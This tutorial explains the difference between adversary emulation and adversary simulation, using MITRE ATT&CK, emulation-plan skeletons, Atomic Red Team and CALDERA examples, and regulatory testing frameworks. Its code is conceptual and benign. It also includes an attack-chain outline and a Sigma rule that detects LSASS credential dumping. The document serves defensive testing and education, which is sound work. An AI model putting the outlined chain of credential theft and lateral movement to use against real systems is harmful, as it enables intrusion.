• Enabling Threat-Informed Cybersecurity: Evolving CISA’s Approach to Cyber Threat Information Sharing | CISA

Adversary Emulation vs. Adversary Simulation: Definitions, Differences, and Why It Matters

Objective: Understand adversary emulation and adversary simulation as distinct offensive-security disciplines, how each maps onto MITRE ATT&CK and real tooling, and how to choose the right methodology so your detection and response controls are tested against the threat you actually care about.

1. Setting the Stage: Why Terminology Precision Matters

The words emulation, simulation, and red teaming are routinely used interchangeably in vendor decks and statements of work. That imprecision has an operational cost. If you commission a generic penetration test and believe you have validated your detection capability against a named threat actor, you have made a category error — you bought a vulnerability-finding exercise and assumed it tested your SOC’s behavioral analytics.

Precise language drives correct scope. Adversary emulation answers “would we detect and respond to what APT29 actually does?” Adversary simulation answers “can an attacker reach our crown jewels through any plausible path?” Both are valuable; they are not substitutes.

2. Foundational Vocabulary: TTPs and the ATT&CK Matrix

Both disciplines speak ATT&CK. The framework decomposes adversary behavior into a hierarchy that red and blue teams share as a common language.

ATT&CK technique IDs (T1566.001, T1078, T1021.002) function as stable identifiers that bind a CTI report, an emulation step, and a detection rule together. When a red-team finding cites T1003.001 and a Sigma rule keys on the same ID, the loop from offense to defense closes cleanly.

3. Adversary Emulation Defined

Adversary emulation is a structured offensive exercise in which the operator replicates the specific TTPs of a named threat actor — derived from cyber threat intelligence (CTI) — to test whether the organization’s controls detect, prevent, or respond to that actor’s real-world playbook.

The defining constraint is intelligence. Introduced by MITRE, the discipline shifts testing away from tools, exploits, and indicators of compromise toward adversary behaviors as described in ATT&CK. The goal is not to replay a malware sample or rebuild exact C2 infrastructure, but to emulate how a real actor selects, chains, and adapts techniques over time to reach its objective.

Because CTI rarely captures complete hands-on-keyboard detail, emulation is behavioral, not scripted. The operator exercises judgment while remaining bound by intelligence-defined objectives, tradecraft patterns, and risk tolerance. Ideally the blue team is blind — the exercise should look like a genuine intrusion, using TTPs known to work in the target environment.

4. Anatomy of an Adversary Emulation Plan

An Adversary Emulation Plan (AEP) is the deliverable that operationalizes a named actor. MITRE’s ATT&CK Evaluations (the APT29 structure) define three components:

MITRE publishes AEPs for actors including APT3 (G0022), APT29 (G0016), FIN6, and menuPass through the Center for Threat-Informed Defense. A minimal AEP skeleton is intentionally a behavioral framework, not an exploit script:

# emulation-plan/generic-apt.yaml  (conceptual)
intelligence_summary:
  actor: "GENERIC-APT (illustrative)"
  references: ["G0016", "internal-cti-2024-114"]
  objective: "Access and exfiltrate finance data"

operational_flow:
  - phase: initial-access
    technique: T1566.001        # Spearphishing Attachment
  - phase: execution
    technique: T1059.001        # PowerShell
  - phase: persistence
    technique: T1547.001        # Registry Run Key
  - phase: credential-access
    technique: T1003.001        # LSASS Memory
  - phase: lateral-movement
    technique: T1021.002        # SMB / Admin Shares
  - phase: exfiltration
    technique: T1041            # Exfiltration Over C2 Channel

Each emulation step references an ATT&CK ID and a short behavioral description — never a weaponized payload.

5. Adversary Simulation Defined

Adversary simulation is a comprehensive assessment of an organization’s preparedness and responsiveness to cyber threats and incidents. It tests detection, response, and recovery procedures while replicating real-world scenarios — but it is goal-oriented and flexible rather than bound to one actor.

The simulating team acts as a hypothetical or generic threat actor and draws TTPs from the ATT&CK matrix broadly, choosing whatever path achieves the objective. Simulation is the right call when the environment is heterogeneous, the threat profile is unknown, or leadership wants a general posture assessment rather than validation against a specific named playbook.

The key axis of difference: simulation is a flexible, goal-oriented test of your security program’s ability to stop an attack path, while emulation is a rigid, intelligence-driven test of your ability to detect and respond to the behaviors of a named threat actor.

6. Side-by-Side Comparison

A convergence zone exists where vendor marketing uses both terms interchangeably — particularly Breach & Attack Simulation platforms that actually perform emulation of named-actor TTPs. Read past the label: ask whether the test is bound to specific CTI (emulation) or open-ended toward a goal (simulation).

7. Red Teaming, Purple Teaming, and BAS on the Spectrum

These methodologies are not competitors; they occupy different points on a spectrum.

Red teaming is the parent concept: using TTPs to emulate a real-world threat and measure the effectiveness of people, processes, and technology. Purple teaming runs red and blue collaboratively to tune detections in real time. Breach & Attack Simulation (BAS) — Picus, Cymulate, AttackIQ — automates and continuously runs TTPs against deployed controls, distinguished from manual emulation by automation and cadence.

8. The Regulatory Dimension: TIBER-EU, CBEST, and DORA

Intelligence-led emulation is now mandated for critical financial infrastructure.

These frameworks operationalize adversary emulation at enterprise scale: a threat-intelligence provider produces a targeting package, an independent red-team provider executes against live systems, and the engagement is governed to manage operational risk. “TLPT” is the regulatory term for exactly the intelligence-led emulation described in Section 3.

9. Tooling Landscape

Atomic Red Team atomics map one test to one technique, ideal for detection validation:

# atomics/T1059.001/T1059.001.yaml  (conceptual)
attack_technique: T1059.001
display_name: "Command and Scripting Interpreter: PowerShell"
atomic_tests:
  - name: "Run a benign discovery command"
    supported_platforms: [windows]
    input_arguments:
      cmd:
        description: "Command to execute"
        type: string
        default: "Get-Process"
    executor:
      name: powershell
      command: "#{cmd}"

CALDERA abilities bind a runnable action to an ATT&CK tactic and technique ID, letting the planner chain them into autonomous campaigns:

# caldera ability (conceptual)
id: 9b1f0c2e-...-illustrative
name: "Local account discovery"
tactic: discovery
technique:
  attack_id: T1087.001
  name: "Account Discovery: Local Account"
platforms:
  windows:
    psh:
      command: |
        Get-LocalUser | Select-Object Name,Enabled

Combine them pragmatically: atomics validate single-technique detections; CALDERA chains techniques into operational flows; BAS provides continuous regression testing of the controls you have already tuned.

10. Building an Emulation Plan from Threat Intelligence

The AEP authoring process turns a CTI report into an ordered operational flow. Conceptually, you extract referenced techniques, resolve them against ATT&CK STIX data, group by tactic, and order the result into the kill-chain progression.

# Conceptual CTI-to-AEP mapping (pseudocode, not tooling)
TACTIC_ORDER = ["initial-access", "execution", "persistence",
                "privilege-escalation", "defense-evasion",
                "credential-access", "lateral-movement",
                "collection", "exfiltration"]

def build_operational_flow(cti_technique_ids, attack_stix):
    steps = []
    for tid in cti_technique_ids:
        obj = attack_stix.lookup(tid)          # resolve T-ID -> ATT&CK object
        steps.append({"id": tid,
                      "tactic": obj.tactic,
                      "name": obj.name})
    # order by kill-chain phase to produce a logical flow
    return sorted(steps, key=lambda s: TACTIC_ORDER.index(s["tactic"]))

The resulting Operational Flow is the behavioral spine of the campaign:

T1566.001 ─► T1059.001 ─► T1547.001 ─► T1078 ─► T1003.001 ─► T1021.002 ─► T1041
Spearphish   PowerShell   Run Key      Valid    LSASS        SMB Admin    Exfil
Attachment   Execution    Persistence  Accounts Credentials  Lateral Mvmt over C2

Operators retain flexibility within each node — emulation constrains the what and why, not every keystroke.

11. Choosing the Right Methodology

Pick based on maturity, threat model, and blue-team readiness:

• Use emulation when you have a clear threat model (a known actor targets your sector) and want to validate detection of that actor’s specific behaviors.
• Use simulation when the threat profile is unknown, the environment is heterogeneous, or you need broad posture coverage.
• Use purple teaming when detections are immature and you want fast, collaborative tuning.
• Use BAS for continuous regression once detections exist.

Hard prerequisite: Simulation is inappropriate when logging infrastructure is insufficient to benefit from gap analysis. A small business that commissions a full simulation without Sysmon, PowerShell logging, and audit policy has wasted resources — there is nothing to see the attack with.

12. Common Attacker Techniques Exercised During Emulation

A representative AEP chains the following primitives; each is a discrete detection opportunity.

The program design principle: build analytics for ATT&CK behaviors, not detections for a single IOC or tool. Behavior-based analytics outlive the infrastructure of any one campaign.

13. Defensive Strategies & Detection

Instrument before you emulate. The events below should fire during a properly logged exercise.

Augment with ETW: Microsoft-Windows-Threat-Intelligence (injection, RX allocations — requires PPL/kernel consumer), Microsoft-Windows-PowerShell/Operational (4103, 4104 script-block logging for T1059.001), and WMI-Activity/Operational (5857–5861). Enable Audit Process Creation with ProcessCreationIncludeCmdLine_Enabled = 1 for full-command-line 4688, plus Audit Object Access → Kernel Object for 4656/4663 on LSASS handles.

Close the loop from finding to detection with a Sigma rule keyed on the same ATT&CK ID the emulation exercised:

title: LSASS Memory Access Consistent with Credential Dumping
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    TargetImage|endswith: '\lsass.exe'
    GrantedAccess: '0x1010'
  condition: selection
level: high
tags:
  - attack.credential_access
  - attack.t1003.001

MITRE ATT&CK Mapping

14. Tools for Adversary Emulation Analysis

Summary

• Emulation is intelligence-driven and named-actor-specific; simulation is goal-driven and actor-agnostic — they are not synonyms.
• An Adversary Emulation Plan binds CTI to behavior through three parts: Intelligence Summary, Operational Flow, and Emulation Plan — a behavioral framework, not a script.
• Red teaming, purple teaming, and BAS occupy distinct points on the spectrum; regulators (TIBER-EU, CBEST, DORA) now mandate intelligence-led emulation as TLPT.
• CALDERA chains ATT&CK-mapped abilities; Atomic Red Team validates single techniques — both speak technique IDs so findings convert directly into detections.
• Instrument before you emulate: deploy Sysmon, ScriptBlock logging, and audit policy first, then close the loop from finding → Sigma rule → SIEM, building analytics for behaviors rather than a single IOC.

Related Tutorials

• APT Profiling: How to Build a Comprehensive Adversary Profile from Open-Source Intelligence
• Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions
• Mapping CTI Reports to ATT&CK TTPs: A Step-by-Step Methodology
• Cyber Threat Intelligence (CTI) Fundamentals: Sources, Types, and the Intelligence Lifecycle
• Navigating ATT&CK Navigator: Building, Annotating, and Exporting Technique Layers

References

• Adversary Emulation Plans | MITRE ATT&CK®
• Get Started: Adversary Emulation and Red Teaming | MITRE ATT&CK®
• Adversary Emulation Library | MITRE Center for Threat-Informed Defense
• MITRE Adversary Emulation Library (GitHub) | center-for-threat-informed-defense
• Welcome to MITRE Caldera’s Documentation (Official Docs)
• Introducing the All-New Adversary Emulation Plan Library | MITRE Engenuity (Medium)